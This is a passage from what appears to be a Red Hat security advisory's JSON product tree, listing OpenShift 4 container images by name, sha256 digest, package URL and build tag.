"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Ae44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Af0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844901"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3A83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846560"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Af54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3Ad23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3Ac9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848132"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3Aba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847815"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846419"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3Abe1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848396"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9@sha256%3Af7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847459"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9-operator@sha256%3Acaaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3Af3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847385"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshot-metadata-rhel9@sha256%3Ae1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3A595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3Abbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847281"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3Af4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773707627"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Ac86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848446"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3Afca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3A4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3Ada587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3A89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3A82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773723092"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3Ab973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844500"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3A98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844865"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-static-ip-manager-rhel9@sha256%3A128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844616"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3A0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3A145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847270"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
